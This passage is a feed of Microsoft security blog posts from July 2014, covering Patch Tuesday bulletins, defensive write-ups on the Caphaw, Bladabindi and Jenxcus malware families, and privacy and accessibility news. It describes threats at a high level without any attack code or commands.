exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-041">MS14-041</a> <p>(Sandbox escape via DirectShow)</p> </td> <td>Attacker running code at low integrity level runs exploit binary to elevate to context of logged-on user.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a 
href="https://technet.microsoft.com/en-us/library/security/MS14-039">MS14-039</a> <p>(Sandbox escape via on-screen keyboard)</p> </td> <td>Attacker running code at low integrity level runs exploit binary to elevate to context of logged-on user.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-042">MS14-042</a> <p>(Service Bus)</p> </td> <td>Attacker could cause Service Bus to stop responding to incoming AMQP messages.</td> <td>Moderate</td> <td>n/a</td> <td>Lower severity issue unlikely to see significant attacker interest.</td> <td>Windows Azure not affected.</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC</p> <br />Tags: Attack Vector, Risk Assessment, rating<br /> <strong>Get security updates for July 2014</strong><br />http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/08/get-security-updates-for-july-2014.aspx<br />Tue, 08 Jul 2014 17:02:00 GMT<br />Eve Blakemore<br /> <div class="post-content user-defined-markup"> <p>Microsoft releases security updates on the second Tuesday of every month.</p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">Skip the details and check for the latest updates.</a></strong></p> <iframe src="http://www.youtube.com/embed/3j-5-xIMgks" frameborder="0" width="854" height="510"></iframe> <p>This bulletin announces the release of security updates for Windows, Microsoft Office, and other programs.</p> <ul> <li><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn how to get security 
updates automatically</a></li> <li><a href="https://technet.microsoft.com/library/security/ms14-jul">For IT Pros: Microsoft Security Bulletin Summary for July 2014</a></li> </ul> <p>To get more information about security updates and other privacy and security issues delivered to your email inbox, <a href="http://www.microsoft.com/security/resources/newsletter.aspx">sign up for our newsletter</a>.</p> </div> <br />Tags: security updates, patch Tuesday<br /> <strong>July 2014 Security Bulletin Release</strong><br />http://blogs.technet.com/b/msrc/archive/2014/07/08/july-2014-security-bulletin-release.aspx<br />Tue, 08 Jul 2014 16:00:00 GMT<br />Dustin C. Childs<br /> <p>Many around the globe have been following the 2014 FIFA World Cup Brazil&trade; closely. Regardless of which country you are supporting, many folks have been impressed by the defensive display put on by keeper <a href="http://en.wikipedia.org/wiki/Tim_Howard">Tim Howard</a> in a loss against Belgium. It was a great performance highlighting a strong defense &ndash; always a good thing to have, be it on the pitch or on your system.</p> <p>This <a href="http://technet.microsoft.com/security/bulletin/MS14-jul">month&rsquo;s</a> release includes six new security bulletins, addressing 29 Common Vulnerabilities and Exposures (CVEs) in Microsoft Windows and Internet Explorer. Two of these security bulletins are rated Critical, three are rated Important, and one is rated Moderate in severity. 
As always, we encourage you to apply all of the updates, but for those who prioritize, we recommend the <a href="https://technet.microsoft.com/library/security/ms14-038">Windows Journal</a> and <a href="https://technet.microsoft.com/library/security/ms14-037">Internet Explorer</a> (IE) updates be on the top of your list.</p> <p>If you are looking for additional resources to help you prioritize, take a look at our recently released <a href="http://mybulletins.technet.microsoft.com/">myBulletins</a>, a free online service for customizing security bulletins. myBulletins enables you to quickly find security bulletins using advanced search and filtering options. The service also provides a dynamic list in a customizable dashboard that can be edited at any time, as well as downloaded to a Microsoft Excel report. Give it a try, and let us know what you think by using the <a href="https://lab.msdn.microsoft.com/mailform/contactus.aspx?refurl=http%3a%2f%2ftechnet.microsoft.com%2fen-us%2fsecurity%2fbb291012.aspx&amp;loc=en-us">site feedback</a> link.</p> <p>Here&rsquo;s an overview of all of the updates released today:</p> <p><i>Click to enlarge<br /><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2654.deployment.jpg"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2654.deployment.jpg" border="0" alt=" " /></a><br /></i></p> <p align="right"><i>*Bulletins in each deployment priority are listed in numerical order by bulletin number</i></p> <p>The security bulletin for <a href="https://technet.microsoft.com/library/security/ms14-038">Windows Journal</a> addresses one privately reported CVE that could allow an attacker to execute code on your system if you open a malicious Windows Journal file. It&rsquo;s worth noting that Windows Server versions do not have Windows Journal installed by default. That&rsquo;s by design. 
You are always at less risk when you have fewer applications installed, so server systems ship with many optional components disabled. If you haven&rsquo;t reviewed the applications installed on your server recently, now is a good time to do so. Reducing the attack surface will have a positive impact on the overall security of the server.</p> <p>The ongoing diligent work from our Internet Explorer team continues this month, with the security bulletin for <a href="https://technet.microsoft.com/library/security/ms14-037">Internet Explorer</a> addressing a total of 24 CVEs. The most critical of these could allow remote code execution if a user views a webpage specially crafted by a cybercriminal. Similar to last month, we have not seen any active attacks attempting to exploit any of the CVEs addressed by this security bulletin &ndash; or any of the other issues we addressed this month. Addressing these items before there is any customer impact from attacks remains our goal with security bulletins.</p> <p>To ensure you have our latest protections while browsing the Internet, you should really upgrade to the latest version of Internet Explorer. For Windows 7 and Windows 8.1, that means Internet Explorer 11 &ndash; the most modern, secure browser we have built. Internet Explorer 11 has advanced security features like <a href="http://msdn.microsoft.com/library/ie/dn265025(v=vs.85).aspx">Enhanced Protection Mode (EPM)</a> and <a href="http://windows.microsoft.com/en-us/internet-explorer/use-smartscreen-filter#ie=ie-11">SmartScreen Filter</a>, support for modern web standards, and Enterprise Mode for rendering legacy web apps. Internet Explorer 11 is much more secure than our older versions, which is why we encourage customers to upgrade.</p> <p>We also have three advisories to address today. The first is a revision to the <a href="https://technet.microsoft.com/en-us/library/security/2871997.aspx">Update to Improve Credentials Protection and Management</a>. 
This new package changes the default behavior for Restricted Admin mode on Windows 8.1 and Windows Server 2012 R2. This advisory deals with different strategies for combating credential theft, which is a hot topic today. Patrick Jungles (lead author) and team have a new whitepaper discussing ways to defend against pass-the-hash style attacks, and there is a new <a href="http://www.microsoft.com/pth">web resource</a> that covers various techniques and tactics to help prevent different types of credential theft attacks. Implementing these tactics <i>before</i> they are needed is another way to positively impact the overall security posture in an enterprise.</p> <p>The <a href="https://technet.microsoft.com/en-us/library/security/2960358.aspx">Update for Disabling RC4 in .NET TLS</a> has been revised as well. This update was revised to announce a Microsoft Update Catalog detection change for the updates requiring installation of the 2868725 prerequisite update. If you have already successfully installed this update, then you don&rsquo;t need to take any further action.</p> <p>Finally, we are revising <a href="http://technet.microsoft.com/security/advisory/2755801">Security Advisory 2755801</a> with the latest update for Adobe Flash Player in Internet Explorer. The update addresses the vulnerabilities described in Adobe Security bulletin APSB14-17. For more information about this update, including download links, see Microsoft Knowledge Base Article <a href="https://support.microsoft.com/kb/2974008">2974008</a>.</p> <p>For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by CVE, visit the <a href="http://technet.microsoft.com/security/bulletin/MS14-jul">Microsoft Bulletin Summary Web page</a>. 
Watch the bulletin overview video below for a brief summary of today&#39;s releases.</p> <p><a href="http://www.youtube.com/v/3j-5-xIMgks?version=3&amp;hl=en_US">Bulletin overview video (YouTube)</a></p> <p>Jonathan Ness and I will host the monthly security bulletin webcast, scheduled for Wednesday, July 9, 2014, at 11 a.m. PDT. There&rsquo;s no longer a need to register before this event to attend. You can find details on how to view the webcast and get a calendar reminder <a href="http://technet.microsoft.com/en-us/security/dn756352">here</a>. I invite you to tune in to learn more about this month&rsquo;s security bulletins.</p> <p>I look forward to hearing any questions about this month&rsquo;s release during our webcast tomorrow.</p> <p>For all the latest information, you can also follow us at <a href="http://www.twitter.com/msftsecresponse">@MSFTSecResponse</a>.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p> <br />Tags: Microsoft Windows, Security Bulletin, Security Advisory, Internet Explorer (IE)<br /> <strong>MSRT July 2014 - Caphaw</strong><br />http://blogs.technet.com/b/mmpc/archive/2014/07/08/msrt-july-2014-caphaw.aspx<br />Tue, 08 Jul 2014 16:00:00 GMT<br />msft-mmpc<br /> <div class="ExternalClass4DDB26D4B75A44729514A31B04E532EE"> <p>This month we added <a 
href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Caphaw">Win32/Caphaw</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Bepush">Win32/Bepush</a> to the <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Malicious Software Removal Tool</a> (MSRT).</p> <p>Caphaw is a malware family that can be used by criminals to gain access to your PC &ndash; the ultimate goal is to steal your financial or banking-related information. The graph below shows the number of machine encounters we have seen since September 2013.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/caphaw.png"><img style="width:500px;height:230px;" alt="Caphaw encounter graph" src="http://www.microsoft.com/security/portal/blog-images/a/caphaw.png" border="0" /></a></p> <p><em>Figure 1: Caphaw encounters</em></p> <p>Caphaw can be installed on a PC via malicious links posted on Facebook, YouTube, and Skype. It can also spread through infected removable drives and drive-by exploits.</p> <p>Once installed, it can use a plugin mechanism to download several other programs from its command and control server. 
Here are some of the plugins and routines that we have seen being downloaded:</p> <ul> <li>Archiver &mdash; A command-line version of <em>winrar.exe</em> which is used to compress files before they are uploaded to remote servers.</li> <li>Backsocks &mdash; Allows remote connection to the infected machine with the ability to tunnel through private networks and firewalls.</li> <li>VNC &mdash; A backdoor that allows the attacker to run commands on an infected machine.</li> <li>Diskspread &mdash; Helps the threat to spread by writing itself to removable drives.</li> <li>Ftpgrabber &mdash; A password stealer.</li> <li>VideoGrabber &mdash; Used for video recording and uploading video to a remote server.</li> <li>MsgSpread &mdash; Helps Caphaw spread by posting Skype messages through the infected user&rsquo;s account.</li> <li>SpBot &mdash; A spamming routine.</li> <li>Rootkit/Bootkit &mdash; A master boot record infection routine.</li> <li>WebInject &mdash; Injects HTML code to trick users and steal banking/financial related information.</li> </ul> <p>We have seen this family targeting the customers of a range of popular banks and financial institutions. It injects into the user&rsquo;s browser with data from the WebInject plugin as mentioned above. This mimics the requested bank&rsquo;s website and login page. The user&rsquo;s login data is then sent to servers controlled by Caphaw.</p> <p>Caphaw also has capabilities beyond just stealing banking information. It allows backdoor access even if the infected machine is behind firewalls or in a private network, which is commonly seen in commercial network setups. 
It can also steal other data, such as FTP passwords, and files from the user&rsquo;s machine.</p> <p>With its modular plugin architecture, the malware author can develop almost any payload, and utilize Caphaw to deliver it to the infected machine.</p> <p>There is more information about this family in the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Caphaw">Win32/Caphaw</a> description.</p> <p>The best protection from this and other threats is to run an up-to-date real-time security product such as <a href="http://www.microsoft.com/security/portal/mmpc/products/default.aspx">Microsoft Security Essentials</a>.</p> <p><em>Edgardo Diaz and Jody Koo</em></p> <p><em>MMPC</em></p> </div> <br /><strong>Protecting Data and Privacy in the Cloud: Part 3</strong><br />http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/07/protecting-data-and-privacy-in-the-cloud-part-3.aspx<br />Mon, 07 Jul 2014 16:04:00 GMT<br />Trusted Cloud Team<br /> <p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p> <p><a href="/b/trustworthycomputing/archive/2014/06/05/protecting-data-and-privacy-in-the-cloud-part-2.aspx">In my last blog post</a>, I made the point that consumers and organizations choose a cloud service based on their ability to trust that the cloud service provider will protect their privacy. At Microsoft we work to earn that trust with specific data protection measures in place and with a promise to use data in a manner consistent with customer expectations. 
Our enterprise customers can rest assured that the data they entrust to us belongs to them.</p> <p>As organizations make the complex decision to invest in cloud services, we understand the importance of being transparent about our practices and policies. <a href="/b/trustworthycomputing/archive/2014/06/27/protecting-data-and-privacy-in-the-cloud-part-3.aspx">See more &gt;&gt;</a></p> <br />Tags: Protecting Data and Privacy, Brendon Lynch, data privacy, Privacy, CSA Star<br /> <strong>Get advance notice about July 2014 security updates</strong><br />http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/03/get-advance-notice-about-july-2014-security-updates.aspx<br />Thu, 03 Jul 2014 17:20:00 GMT<br />Eve Blakemore<br /> <p>Today, the Microsoft Security Response Center (MSRC) posted details about the <a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-jul">July security updates</a>.</p> <p>If you have automatic updating turned on, most of these updates will download and install on their own. Sometimes you may need to provide input for Windows Update during an installation. In this case, you'll see an alert in the notification area at the far right of the taskbar&mdash;be sure to click it.</p> <p>In Windows 8, Windows will turn on automatic updating during setup unless you choose to turn it off. 
To check this setting and turn on automatic updating, open the <a href="http://windows.microsoft.com/en-us/windows-8/charms" target="_blank"><strong>Search charm</strong></a>, enter <strong>Turn automatic updating on or off</strong>, and tap or click <strong>Settings</strong> to find it.</p> <p><a href="http://windows.microsoft.com/en-us/windows7/install-windows-updates">Learn how to install Windows Updates in Windows 7</a>.</p> <p><strong>If you are a technical professional</strong></p> <p>The <a href="http://www.microsoft.com/technet/security/Bulletin/advance.mspx">Microsoft Security Bulletin Advance Notification Service</a> offers details about security updates approximately three business days before they are released. We do this to enable customers (especially IT professionals) to plan for effective deployment of security updates.</p> <p><a title="Sign up for security notifications" href="http://technet.microsoft.com/en-us/security/dd252948">Sign up for security notifications</a></p> <br />Tags: updates, malware, monthly security updates, automatic updating, Automatic Updates, Microsoft Update, Windows 7, Windows Update, online safety, cybersecurity, cybersafety, Microsoft Windows, Microsoft, Advance Notification Service, ANS, Windows 8<br /> <strong>Advance Notification Service for the July 2014 Security Bulletin Release</strong><br />http://blogs.technet.com/b/msrc/archive/2014/07/03/advance-notification-service-for-the-july-2014-security-bulletin-release.aspx<br />Thu, 03 Jul 2014 16:00:00 GMT<br />Dustin C. 
Childs<br /> <p>Today, we provide <a href="http://technet.microsoft.com/security/bulletin/MS14-jul">advance notification</a> for the release of six Security Bulletins. Two of these are rated Critical, three are rated as Important, and one is rated Moderate in severity. These Updates are for Microsoft Windows and Internet Explorer.</p> <p>This month we will also premiere the new format for our Security Bulletin Webcast, scheduled on Wednesday, July 9, at 11 a.m. PDT. Registration, downloading the Live Meeting client, and dialing in to a separate number will no longer be required. You can find details on how to view the webcast <a href="http://technet.microsoft.com/en-us/security/dn756352">here</a>.</p> <p>As per our usual process, we&rsquo;ve scheduled the Security Bulletin release for the second Tuesday of the month, July 8, 2014, at approximately 10:00 a.m. PDT. Revisit this blog then for analysis of the relative impact, as well as deployment guidance, together with a brief video overview of the month&rsquo;s Updates. 
Until then, please review the <a href="http://technet.microsoft.com/security/bulletin/MS14-jul" title="ANS summary page">ANS summary page</a> for more information to help you prepare for Security Bulletin testing and deployment.</p> <p>Don&rsquo;t forget, you can also follow us on Twitter at <a href="https://twitter.com/msftsecresponse" title="@MSFTSecResponse">@MSFTSecResponse</a>.</p> <p>Thank you, <br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p> <br />Tags: Microsoft Windows, ANS, Internet Explorer (IE)<br /> <strong>Microsoft Expert Elevated Accessibility in Her 12 Years Leading a Key Industry Panel</strong><br />http://blogs.msdn.com/b/accessibility/archive/2014/07/03/microsoft-expert-elevated-accessibility-in-her-12-years-leading-a-key-industry-panel.aspx<br />Thu, 03 Jul 2014 15:13:00 GMT<br />Daniel Hubbell - MSFT<br /> The following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues. 
----- Microsoft policy expert Laura Ruby ended her...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/03/microsoft-expert-elevated-accessibility-in-her-12-years-leading-a-key-industry-panel.aspx">read more</a>) <br /><strong>The Secret of the SDL</strong><br />http://blogs.technet.com/b/security/archive/2014/07/02/the-secret-of-the-sdl.aspx<br />Wed, 02 Jul 2014 16:08:27 GMT<br />Tim Rains - Microsoft<br /> <p>&ldquo;We all knew what the problems were, but the real issue was, things were getting worse and worse. How were we going to get ahead of this? That&rsquo;s what we really had to go fix.&rdquo; &ndash; Steve Lipner, Partner Director of Program Management at Microsoft.</p> <p>When researchers at a small firm called eEye Digital Security noticed a nasty self-replicating code known today as &ldquo;Code Red,&rdquo; little did they know that this worm, named after a flavor of Mountain Dew, would also kick off the tech industry&rsquo;s best security model. It&rsquo;s stories like this one, captured in the new in-depth magazine &ldquo;<a href="http://cspauthoring:8000/security/sdl/resources/publications.aspx">Life in the Digital Crosshairs; the dawn of the Microsoft Security Development Lifecycle</a>,&rdquo; that chronicle how the <a href="http://www.microsoft.com/security/sdl/default.aspx">Microsoft Security Development Lifecycle</a> (SDL) has been helping public and private organizations for the past 10 years change their engineering cultures and develop more secure software.</p> <p>&ldquo;Our Secure Product Lifecycle is analogous to Microsoft&rsquo;s Security Development Lifecycle,&rdquo; says Brad Arkin, 
chief security officer at Adobe. &ldquo;We value this process and the information it helps protect.&rdquo; <a href="/b/security/archive/2014/07/07/the-secret-of-the-sdl.aspx">read more</a></p> <br />Tags: SDL 10 Year, Life in the Digital Crosshairs, Security Development Lifecycle<br /> <strong>Windows XP registry hack will not protect your PC against all threats</strong><br />http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/01/windows-xp-registry-hack-will-not-protect-your-pc-against-all-threats.aspx<br />Tue, 01 Jul 2014 15:28:00 GMT<br />Eve Blakemore<br /> <p>In April, Microsoft <a href="http://blogs.msdn.com/b/securitytipstalk/archive/2014/04/08/get-security-updates-for-april-2014.aspx">ended support for Windows XP</a>. This means that if your computer is still running Windows XP, you are no longer receiving security updates.</p> <p><a href="http://www.bing.com/search?q=Windows+XP+registry+hack&amp;qs=n&amp;form=QBLH&amp;pq=windows+xp+registry+hack&amp;sc=3-24&amp;sp=-1&amp;sk=&amp;cvid=976b56ee73524a9482c662364314b377">Several tech news sources</a> have recently reported a change that you can make to your Windows registry (known as a &ldquo;registry hack&rdquo;) that tells your Windows XP computer that it&rsquo;s running Windows Embedded or Windows Server 2003.</p> <p>Although this hack might allow your Windows XP computer to receive automatic updates, these updates will not fully protect your Windows XP computer. 
And because these updates are not intended for Windows XP, they might also cause your computer to stop working correctly.</p> <p>If you are running Windows XP, the best way to protect your computer is to upgrade to a modern operating system, like Windows 8.1.</p> <p><a href="http://windows.microsoft.com/en-us/eos">Learn more about your options if your computer is still running Windows XP</a></p> <br />Tags: updates, monthly security updates, security updates, automatic updating, Automatic Updates, security, Microsoft Update, Windows 7, Windows Update, patch Tuesday, Windows XP, Microsoft Windows, Windows 8, registry hack<br /> <strong>Surface Pro and Xbox One Help Washington Man Overcome a Life-changing Injury</strong><br />http://blogs.msdn.com/b/accessibility/archive/2014/07/01/tyler-readmore.aspx<br />Tue, 01 Jul 2014 14:10:00 GMT<br />Daniel Hubbell - MSFT<br /> After Tyler Schrenk was paralyzed from the neck down in an accident two years ago, connections many of us take for granted &ndash; email, online news websites, Facebook and other social media &ndash; became far harder. 
Now, a Microsoft Surface Pro is helping...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/01/tyler-readmore.aspx">read more</a>) <br /><strong>Advancing our encryption and transparency efforts</strong><br />http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx<br />Tue, 01 Jul 2014 13:33:33 GMT<br />Trusted Cloud Team<br /> <p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>As a company, we have been working hard to further increase data security protections in our services, to add capacity to our transparency center engagements with governments, and to push governments to be more transparent themselves.</p> <p>In December, we <a href="/b/microsoft_blog/archive/2013/12/04/protecting-customer-data-from-government-snooping.aspx">announced our commitment</a> to increase the security of our customers&rsquo; data, and our plans to reinforce legal protections for our customers&rsquo; data. In January, we <a href="/b/microsoft_on_the_issues/archive/2014/01/20/time-for-an-international-convention-on-government-access-to-data.aspx">called for an international convention focused on the issue of government access to data</a>. Then in March, we shared the <a href="/b/microsoft_on_the_issues/archive/2014/03/28/we-re-listening-additional-steps-to-protect-your-privacy.aspx">additional steps we took to protect your privacy</a>.</p> <p>We are committed to earning our customers&rsquo; trust each and every day, and today, Matt Thomlinson, vice president for Trustworthy Computing Security, shares the progress we are making on these fronts. 
I encourage you to check out his <a href="/b/microsoft_on_the_issues/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx">Microsoft on the Issues blog post</a> to learn more about this announcement. <a href="/b/trustworthycomputing/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx" target="_blank">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx">read more</a>)

Microsoft Digital Crimes Unit disrupts Jenxcus and Bladabindi malware families
http://blogs.technet.com/b/mmpc/archive/2014/06/30/microsoft-digital-crimes-unit-disrupts-jenxcus-and-bladabindi-malware-families.aspx
Mon, 30 Jun 2014 20:00:38 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:1820cd33-36f5-43d0-9e40-61fa4adf33de
msft-mmpc
http://blogs.technet.com/b/mmpc/archive/2014/06/30/microsoft-digital-crimes-unit-disrupts-jenxcus-and-bladabindi-malware-families.aspx#comments
<p>Today, following an investigation to which the Microsoft Malware Protection Center (MMPC) contributed, the Microsoft Digital Crimes Unit initiated a disruption of the <a href="http://www.microsoft.com/security/portal/threat/Encyclopedia/Entry.aspx?Name=VBS/Jenxcus">Jenxcus</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=MSIL/Bladabindi">Bladabindi</a> malware families. These families are believed to have been created by the individuals Naser Al Mutairi, aka njQ8, and Mohamed Benabdellah, aka Houdini. These actions are the first steps to stop the people who created, distributed, and assisted the propagation of these malware families.</p> <p>There are more details about the takedown itself in the latest blog from the <a href="http://blogs.technet.com/b/microsoft_blog/">Microsoft Digital Crimes Unit</a>.</p> <p>At the MMPC we have been monitoring both malware families for some time. We have observed the Bladabindi family since at least July 2012. Jenxcus came onto the scene as early as December 2012. During the past year, Microsoft detected more than 7,486,833 instances of computers running Microsoft Windows with some version of Bladabindi or Jenxcus.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU1.png"><img width="500" alt="Malware heat map" src="http://www.microsoft.com/security/portal/blog-images/a/DCU1.png" border="0" /></a></p> <p><em>Figure 1: Heat map showing the global impact of Bladabindi and Jenxcus during the past year</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU2.png"><img width="500" alt="Jenxcus machine count" src="http://www.microsoft.com/security/portal/blog-images/a/DCU2.png" border="0" /></a></p> <p><em>Figure 2: Machine encounters per month for Jenxcus</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU3.png"><img width="500" alt="Bladabindi machine count" src="http://www.microsoft.com/security/portal/blog-images/a/DCU3.png" border="0" /></a></p> <p><em>Figure 3: Machine encounters per month for Bladabindi</em></p> <p>These families can install backdoor trojans on your computer, which allow criminals to steal your information, such as your passwords, and use your computer to collect other sensitive information. For example, Bladabindi can take snapshots and record videos without your permission. It can also control your system remotely.</p> <p>These backdoor trojans can also upload new components or malware to your computer to add more malicious functionality. They typically communicate with hosts whose names are registered through a Dynamic DNS service such as NO-IP, because this makes them more difficult to trace.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU4a.png"><img width="500" alt="Control dashboard" src="http://www.microsoft.com/security/portal/blog-images/a/DCU4a.png" border="0" /></a></p> <p><em>Figure 4: An example dashboard showing how an attacker controls infected machines</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU5a.png"><img width="500" alt="Malware commands" src="http://www.microsoft.com/security/portal/blog-images/a/DCU5a.png" border="0" /></a></p> <p><em>Figure 5: The possible commands available to the malware writer</em></p> <p>These malware families spread primarily through social engineering techniques that try to trick unsuspecting victims into carrying out some action which results in their computer getting infected. For example, Bladabindi can be installed when you:</p> <ul> <li>Visit a hacked website.</li> <li>Click on a malicious link in a social media message.</li> <li>Receive and open an email &ldquo;sent&rdquo; by friends and family who have been infected with the malware.</li> </ul> <p>Bladabindi also plants files with enticing names and icons on removable media and linked drives to lure new victims. There are more examples of these techniques in our blog <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/14/msrt-january-2014-bladabindi.aspx">MSRT January 2014 &ndash; Bladabindi</a>.</p> <p>Most Jenxcus infections occur through torrents and websites when the malware is bundled with other programs or videos. Jenxcus also tries to trick you into installing it by pretending to be a Flash update that you need to install before watching a video. After infecting a computer, Jenxcus leaves enticing shortcut files on removable media that look like songs or other personal files. When opened, these files run a copy of the malware.</p> <p>Through our research we have observed that there is information available in public online forums and group discussions, including tutorials, that allows anyone to download a package and create their own versions of the malware. This makes Bladabindi and Jenxcus a bit different from the previous botnets we have seen. A traditional botnet usually has one command-and-control (CNC) server to control all infected machines. In the case of Bladabindi and Jenxcus there can be a syndicate of botnets and thousands of botnet herders.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU6.png"><img alt="CnC communication" src="http://www.microsoft.com/security/portal/blog-images/a/DCU6.png" border="0" /></a></p> <p><em>Figure 6: The communication method of the CNC and the infected system</em></p> <p>Microsoft added <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/14/msrt-january-2014-bladabindi.aspx">Bladabindi to the Malicious Software Removal Tool</a> in January 2014. <a href="http://blogs.technet.com/b/mmpc/archive/2014/02/11/msrt-february-2014-jenxcus.aspx">Jenxcus was added to the MSRT</a> in February 2014. However, with aggressive infection and distribution methods, the malware authors and the distribution system behind them have continued to affect thousands of Microsoft customers every day.</p> <p>Anyone concerned that their computer is infected with malware should follow the guidance available from the <a href="http://support.microsoft.com/gp/cu_sc_virsec_master">Microsoft Support Virus and Security Center</a>. To help stay protected we also recommend that you install an up-to-date, real-time protection security product such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p><em>Tanmay Ganacharya and Francis Tan Seng</em></p> <p><em>MMPC</em></p>

Microsoft Takes Legal Action to fight Malware: Bladabindi and Jenxcus
http://blogs.technet.com/b/security/archive/2014/06/30/microsoft-takes-legal-action-to-fight-malware-bladabindi-and-jenxcus.aspx
Mon, 30 Jun 2014 19:30:00 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:2819d574-260e-4cd1-a2c5-89eb94b614c4
Tim Rains - Microsoft
http://blogs.technet.com/b/security/archive/2014/06/30/microsoft-takes-legal-action-to-fight-malware-bladabindi-and-jenxcus.aspx#comments
<p>Today, Microsoft filed a civil suit against a Dynamic DNS provider in the U.S. (Vitalwerks Internet Solutions, LLC, doing business as No-IP.com) and identified two individuals who are believed to have used this DNS provider to spread dangerous malware (Bladabindi and Jenxcus) to unsuspecting victims and to control it.
Bladabindi or Jenxcus was <a href="http://www.microsoft.com/security/sir/glossary.aspx#E">encountered</a> more than 7.4 million times over the past twelve months worldwide.</p> <p>The two people identified allegedly used social media to flaunt their creation and dissemination of two well-known types of malware, known by the <a href="http://www.microsoft.com/security/portal/mmpc/default.aspx">Microsoft Malware Protection Center</a> (MMPC) as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/search.aspx?query=jenxcus">Jenxcus</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/search.aspx?query=bladabindi">Bladabindi</a>. <a href="/b/security/archive/2014/06/30/microsoft-takes-legal-action-to-fight-malware-bladabindi-and-jenxcus.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/30/microsoft-takes-legal-action-to-fight-malware-bladabindi-and-jenxcus.aspx">read more</a>)
Tags: DNS, Digital Crimes Unit, Jenxcus, legal action, Vitalwerks, No-IP.com, Bladabindi

Texas Wins FCC Award for Its New Tools That Help People Create Accessible Microsoft Materials
http://blogs.msdn.com/b/accessibility/archive/2014/06/26/texas-wins-fcc-award-for-its-new-tools-that-help-people-create-accessible-microsoft-materials.aspx
Thu, 26 Jun 2014 21:13:06 GMT
91d46819-8472-40ad-a661-2c78acb4018c:10537722
Daniel Hubbell - MSFT
http://blogs.msdn.com/b/accessibility/archive/2014/06/26/texas-wins-fcc-award-for-its-new-tools-that-help-people-create-accessible-microsoft-materials.aspx#comments
The Texas state government won a national award earlier this month for its new web-based tools that help people create accessible Microsoft 2010 materials, everything from Word documents to PowerPoint demonstrations. Texas won one of the Federal Communication...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/26/texas-wins-fcc-award-for-its-new-tools-that-help-people-create-accessible-microsoft-materials.aspx">read more</a>)

Is that call from Microsoft a scam?
http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/26/is-that-call-from-microsoft-a-scam.aspx
Thu, 26 Jun 2014 15:46:00 GMT
91d46819-8472-40ad-a661-2c78acb4018c:10536594
Eve Blakemore
http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/26/is-that-call-from-microsoft-a-scam.aspx#comments
